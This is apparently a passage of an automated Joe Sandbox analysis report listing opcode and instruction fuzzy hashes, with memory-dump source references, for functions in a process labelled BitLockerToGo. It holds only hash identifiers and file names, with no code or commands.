                                                                            • Opcode Fuzzy Hash: 7093a3d056c1b312e1be535059c24b31c38d8c495b8bb67b798fde0df4f18d52
                                                                            • Instruction Fuzzy Hash: 8E515A727052119BC7198A28CCA173FB6E3BBC5711F2D822DE886573D5DB749C098691
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cf0b5d2700bb8af450f0d45d50400f7ba5e2314a64ad967f1589709c4dea5ca6
                                                                            • Instruction ID: 4da2d9a7e17ffcc7519f3b3416cbfec2ed3565fcd634ce4a5b50bd0d57d4eef8
                                                                            • Opcode Fuzzy Hash: cf0b5d2700bb8af450f0d45d50400f7ba5e2314a64ad967f1589709c4dea5ca6
                                                                            • Instruction Fuzzy Hash: F94149717453A85BEB218A2898817FA7FD4AF93310F18C53DED888B3C2E234D905D365
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 95ff64a0f2e608e85dd80d66e126acdc5a56ea3d778b37ffd8f8255063b933ce
                                                                            • Instruction ID: a1d4850fe56069de913da22ee406545757f6cd2ed0e401e98a4ee5c8f5ee67b6
                                                                            • Opcode Fuzzy Hash: 95ff64a0f2e608e85dd80d66e126acdc5a56ea3d778b37ffd8f8255063b933ce
                                                                            • Instruction Fuzzy Hash: B83148BA5083656BC7241F3968C4276BFA5BF97310F194478E889872D2E271DD898361
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c643a0a28a69b38ffba9a526d6d73f36537f224bacab099543396b6f4234a70
                                                                            • Instruction ID: 2b5332da63599458d0a4a8a0cccfa8cf6294d21f48a69fb54cc9fbbcf0beecfa
                                                                            • Opcode Fuzzy Hash: 6c643a0a28a69b38ffba9a526d6d73f36537f224bacab099543396b6f4234a70
                                                                            • Instruction Fuzzy Hash: BA217F3390C3A80FD3188E785895226BFD29FCA311F4F927EC8904B292EEB54D0D86C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0849aeefc7ddc3d9874f629471b75dd60f9ccf914856cb542aac47cd7beed75b
                                                                            • Instruction ID: 5553926ed9e052bddc329a886c40172539e6ba228e355516ed54f31d394ce0a4
                                                                            • Opcode Fuzzy Hash: 0849aeefc7ddc3d9874f629471b75dd60f9ccf914856cb542aac47cd7beed75b
                                                                            • Instruction Fuzzy Hash: 9421AD71000A018ACB259F38D8A1BB3B7F1FF96324F09894DE5A68B2A1EB74A400DB51
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0e523d83cfbcf76a5e1bae7ec6af0157475193ac788831f76517af930af83916
                                                                            • Instruction ID: c1468ebf6bebe1007a786eaabe01e010299ad12794d114d20536abacc72e5d0d
                                                                            • Opcode Fuzzy Hash: 0e523d83cfbcf76a5e1bae7ec6af0157475193ac788831f76517af930af83916
                                                                            • Instruction Fuzzy Hash: 92214B31B586614FC708CF3848E113BFBE6ABDA224F49866EC565C71E1D725D90A8B80
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ad2ca6ffae4b87dad7406b1f669c45112227157429ac7a9361c1f362aa9efb5
                                                                            • Instruction ID: d4c326691bfafc3eb4332f9f3c03c6ef51071534f9c2c92b74e18e9c0921c254
                                                                            • Opcode Fuzzy Hash: 5ad2ca6ffae4b87dad7406b1f669c45112227157429ac7a9361c1f362aa9efb5
                                                                            • Instruction Fuzzy Hash: 9E21AEB2D1122687CB209F14CCA25B7F7B1FF913A1B198654DC965B381F7789E80C794
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1ac62685773c58682c2059261c804275be2c8970e5a5e4b874c29fbc6a298a4a
                                                                            • Instruction ID: 27d3fd959cc52969489a081a7b023e3b724ab3a69f513e3d9b8481ba0506fca3
                                                                            • Opcode Fuzzy Hash: 1ac62685773c58682c2059261c804275be2c8970e5a5e4b874c29fbc6a298a4a
                                                                            • Instruction Fuzzy Hash: CB31B5316086219BD7109F58E980937BBE1FF96354F18892DF8AA872D1D731DC42CB56
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: acb1495111e7abb5016dfce80d0f28ca9bdefd320809d032bea1d51fc71fe80f
                                                                            • Instruction ID: a35d9e062b793b2350cb1e539701112d79b46c734f0f5c8b2578fd5dc97e0369
                                                                            • Opcode Fuzzy Hash: acb1495111e7abb5016dfce80d0f28ca9bdefd320809d032bea1d51fc71fe80f
                                                                            • Instruction Fuzzy Hash: 3431ACB15093908BE324CF14D891B6FBFE5EBD5314F148A2CF4D59B2A1D778894A8B83
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b7870e7cf9a2651936558c9babb3703da1026fb4e3df559288fb44f2af94eeaf
                                                                            • Instruction ID: 3f398f99e53a3c4e920dee9da839607335f550cb11cdadb65ba6f59b067cdce3
                                                                            • Opcode Fuzzy Hash: b7870e7cf9a2651936558c9babb3703da1026fb4e3df559288fb44f2af94eeaf
                                                                            • Instruction Fuzzy Hash: 5901D262A00211C3C7209F28CC92A73B7B8BF56364F598214E8669B3C1F7B4EE04C3E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                            • Instruction ID: 6c27487904abe41b13cb9846e5e66ec4b8511f4abf29a52a792901d598e5cfe5
                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                            • Instruction Fuzzy Hash: AC11AC3364D1E90EC3158D3C84805A57FD31A93639B5943A9F8B89B1D2D5228D8A9355
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca41b713dd7dd2d53d7fcb7448b78b9d6e7f97051aad3a1287c73cab64d20cb6
                                                                            • Instruction ID: e8c6664f020e7b07fbcd4411fafc54543a3cb7cefc0761d78639b75c006ba0b7
                                                                            • Opcode Fuzzy Hash: ca41b713dd7dd2d53d7fcb7448b78b9d6e7f97051aad3a1287c73cab64d20cb6
                                                                            • Instruction Fuzzy Hash: 3B01B1F2A0131247DB20AE55E4C5B7BBAB87F81748F18042CE80557342DB71EE08C691
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fae8df93929c706ac3b61e2441201d8c1d2c348a85b17fa58afedf52aec32750
                                                                            • Instruction ID: 2c14e883fd8439c74f5c900853956f2cee77c627f8178a2e6daab24e17c680e7
                                                                            • Opcode Fuzzy Hash: fae8df93929c706ac3b61e2441201d8c1d2c348a85b17fa58afedf52aec32750
                                                                            • Instruction Fuzzy Hash: E9018435A0A600DFD7188B24C95093FFBA1FBD5714F651A2CE89223671C770EC01DB82
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 48bcc383ba1dc5bf6b1204256c1279d0bee62d48da2d2f0de550230590093ef9
                                                                            • Instruction ID: 26f735e42a3c8f1f4b3bcfc89807a781394d62f934de8453349f2a57920c3d92
                                                                            • Opcode Fuzzy Hash: 48bcc383ba1dc5bf6b1204256c1279d0bee62d48da2d2f0de550230590093ef9
                                                                            • Instruction Fuzzy Hash: 4C01C0356182009FD7098F28E89093BB7A2FBA6755F54992CE08363161C772ED4BCF85
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f603cac06b734bda0b970e5b16727069ae5e0e855a1438700608dfedd0a6508d
                                                                            • Instruction ID: e8edd3866d024d2eb5fb9be797339409ad44e65b1799f517291b89b142697770
                                                                            • Opcode Fuzzy Hash: f603cac06b734bda0b970e5b16727069ae5e0e855a1438700608dfedd0a6508d
                                                                            • Instruction Fuzzy Hash: E7115532501A418FC3258F3C8881456B7A2FFE332471A866EC0E94B7A3DB31D94B8784
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3871c5fc9c709347a3151bb140cb4eb7fd5c1bfc1cea3d12b2f5f603c3026932
                                                                            • Instruction ID: 85704c8e02f767746cac838b01bedc40f231b5e18a480ef7b53cecb0309fa24e
                                                                            • Opcode Fuzzy Hash: 3871c5fc9c709347a3151bb140cb4eb7fd5c1bfc1cea3d12b2f5f603c3026932
                                                                            • Instruction Fuzzy Hash: 40012DF4C01204BBDB40EFA9ED4759EBE79AB46221F58422AF84477345D231041E8BE3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f39aada83e9efd88215dac0b6f7664cb0f76e25ba1a078eec7b4771513af7530
                                                                            • Instruction ID: ff6a8680d5c0cd93438d199d559236d518d16e2c179f483f90cd64941631d602
                                                                            • Opcode Fuzzy Hash: f39aada83e9efd88215dac0b6f7664cb0f76e25ba1a078eec7b4771513af7530
                                                                            • Instruction Fuzzy Hash: 7C012871E0A300CFD3188F18D89277ABB61FBAA328F184A2DE44523162C7B5CD4A8B55
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                            • Instruction ID: aec9cfbf4b6364aba83e381510de0a55a09a30413bb2aaa51c073dad037f68f8
                                                                            • Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                            • Instruction Fuzzy Hash: 0D01A267A013129B8324CE5CC4D16ABB3B0FF95B94B1A445DD5415B370D7319D158264
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6ecccec5758a69277ae18a04f0ed3285a986a5cf3800d65013b0914b9c2b99d5
                                                                            • Instruction ID: cac3f62113a2d7626cbeeac3ba62c759dc5c104e3a6d84bf9206a65618c15d06
                                                                            • Opcode Fuzzy Hash: 6ecccec5758a69277ae18a04f0ed3285a986a5cf3800d65013b0914b9c2b99d5
                                                                            • Instruction Fuzzy Hash: 3F01C0B19293808BD7089F24E56561FBBF5BBE6301F486D2DF592C7651E774C4098B03
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3b9d1f15141d479650b27aa3034152b4b5a468606fed9e75f5dacef1631fa960
                                                                            • Instruction ID: 44df74951bc16c56faf6e9f786f044f8303b5720b00401b5732810ccbe1737f6
                                                                            • Opcode Fuzzy Hash: 3b9d1f15141d479650b27aa3034152b4b5a468606fed9e75f5dacef1631fa960
                                                                            • Instruction Fuzzy Hash: 10F0222291C2718AC704DF28900217BF7F1BF51B06F19982ECCC0B7246D236CE48CA82
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be46ac054bfddfd0d5368cdcf921fb790f41f764764cdef0d7dddbca6b43c080
                                                                            • Instruction ID: 5e598b8eb21ed98106f3aabcc06b3f8b126a94c7cb687303849623ce83c9ef5d
                                                                            • Opcode Fuzzy Hash: be46ac054bfddfd0d5368cdcf921fb790f41f764764cdef0d7dddbca6b43c080
                                                                            • Instruction Fuzzy Hash: 34E030B1500F009BE325EF34D866766B6E5BF55344F41481DE567435A2EB70F018C608
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4a21a0fe4e872c4a2836c011d7538da6e7f318107769a4f2d14a6d0065662fae
                                                                            • Instruction ID: be853f79dbd977ff9d6db8598bcfa9c4f8e83262b1dddc6f5ce5fb59f5fa6e5c
                                                                            • Opcode Fuzzy Hash: 4a21a0fe4e872c4a2836c011d7538da6e7f318107769a4f2d14a6d0065662fae
                                                                            • Instruction Fuzzy Hash: D2F0FE3142826187C678FB14D865DFDB7647FE2348F05051CD89A136919E246946DA91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4bcac78dcadb3e9dfb3b10a2fa37d29c6bd1a8653a44dd73c31d879f507edf11
                                                                            • Instruction ID: cefdbe4db7d73e4b1e856b6a53335eab976d072989fc735eaa174a9a44cfcf38
                                                                            • Opcode Fuzzy Hash: 4bcac78dcadb3e9dfb3b10a2fa37d29c6bd1a8653a44dd73c31d879f507edf11
                                                                            • Instruction Fuzzy Hash: 65E067B191C641BFE254CF28DC80DBBB3EDFB6A206F042918FA55D3160CA31DC54DA29
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4b89895770b6a09bdb997aaa27b2b4240868da8d7db00d7b610687917677959f
                                                                            • Instruction ID: 8725f068bf8b1dfb73c7f0c71895f6be57584f0d649defe93d39c6289bf882a2
                                                                            • Opcode Fuzzy Hash: 4b89895770b6a09bdb997aaa27b2b4240868da8d7db00d7b610687917677959f
                                                                            • Instruction Fuzzy Hash: CCE08C70A48643C6C7198E29A0A43B1AF772B97308F38A9B8CA805B2C6C577C807A124
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 39b85b7c48717be22c4d80fb9443e2d5a0a80d68075e490b777b04226981588f
                                                                            • Instruction ID: ac7be98ac6a69eec2c6d8cadf5b185c793c96aea1c24edc2422a5a3c9f98e1bd
                                                                            • Opcode Fuzzy Hash: 39b85b7c48717be22c4d80fb9443e2d5a0a80d68075e490b777b04226981588f
                                                                            • Instruction Fuzzy Hash: 29D05E71904A00DFD3258F68ED80973B7FABF9E301310592CD04783560EFB0E8099B24
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bb2e5dab87bb42bcbd30298c33b5f97e79d8b7f3dc0bcab2b3c504b1af2df7fb
                                                                            • Instruction ID: 7762af9d95724d2d1c023ca1fc121581847965b4807c5f37fb8e9deee9c3baa6
                                                                            • Opcode Fuzzy Hash: bb2e5dab87bb42bcbd30298c33b5f97e79d8b7f3dc0bcab2b3c504b1af2df7fb
                                                                            • Instruction Fuzzy Hash: 6CC08070AA020056D17CCF288C41F37F56F5B96505F207515D4023B2C38AB4E405558C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aa51dd410144a7ec6d2b7c5d7ec5bcf7f612f2dedc426fb808d916e582b817fd
                                                                            • Instruction ID: 33f7984aeeaa51cb060b2905d47f4685b4ebe699b0ecf379ec62389db77aefd4
                                                                            • Opcode Fuzzy Hash: aa51dd410144a7ec6d2b7c5d7ec5bcf7f612f2dedc426fb808d916e582b817fd
                                                                            • Instruction Fuzzy Hash: C3C01233D94531878B588914DC610B466241B5621471EAB24CC5F73750D9148D04A5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7f7dc1c8bdec7ae37c4d310c7025c86fc29c100fd1112718257ef14eeac4a174
                                                                            • Instruction ID: 0243c594943113aa5485b13da5d39673f1db9e26ba34efaf07c2a8db688b6bd1
                                                                            • Opcode Fuzzy Hash: 7f7dc1c8bdec7ae37c4d310c7025c86fc29c100fd1112718257ef14eeac4a174
                                                                            • Instruction Fuzzy Hash: F7B092A6C0201296A1917A503C4A43BB43429A3604F452474E80A22342EA16D21E605B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c545c53ca369a8780d52848b2d877f591d1f669f481a18ce7a704a2e29a8ee47
                                                                            • Instruction ID: 35717a94aa6a9b1c44ad4bda1de8725a73e2619146e911c448e77a5b1109dd7a
                                                                            • Opcode Fuzzy Hash: c545c53ca369a8780d52848b2d877f591d1f669f481a18ce7a704a2e29a8ee47
                                                                            • Instruction Fuzzy Hash: FFA00415C5DD15C745505D1D5C10174F1355557131F557340D574333DD5770D504F5CC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd3ddada63cd3c6e81c12a419534a95b1f5a3f944651421f192f81ce2313e682
                                                                            • Instruction ID: acecd5ab707af9f1c5b6e2c1036e5b6991a78d1c41b40e167ef9a4c71bee0b32
                                                                            • Opcode Fuzzy Hash: fd3ddada63cd3c6e81c12a419534a95b1f5a3f944651421f192f81ce2313e682
                                                                            • Instruction Fuzzy Hash: DFA00270E481208BD3088E18D5507B1E23D9B9F305F103419D4497B5D2CEE7EC44961C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: df5e9566a94a2afa42257f26e5b791d59a7cda0470a9036a13c6d677df916e34
                                                                            • Instruction ID: a8d1871b581a708b3f32e274e0941be25da9a20ca480e99ad83b16e2fdcfa4ea
                                                                            • Opcode Fuzzy Hash: df5e9566a94a2afa42257f26e5b791d59a7cda0470a9036a13c6d677df916e34
                                                                            • Instruction Fuzzy Hash: 0D900230D495018681408E08D440470E278931B152F103400D008F3022C650D454560C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true
                                                                            • Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
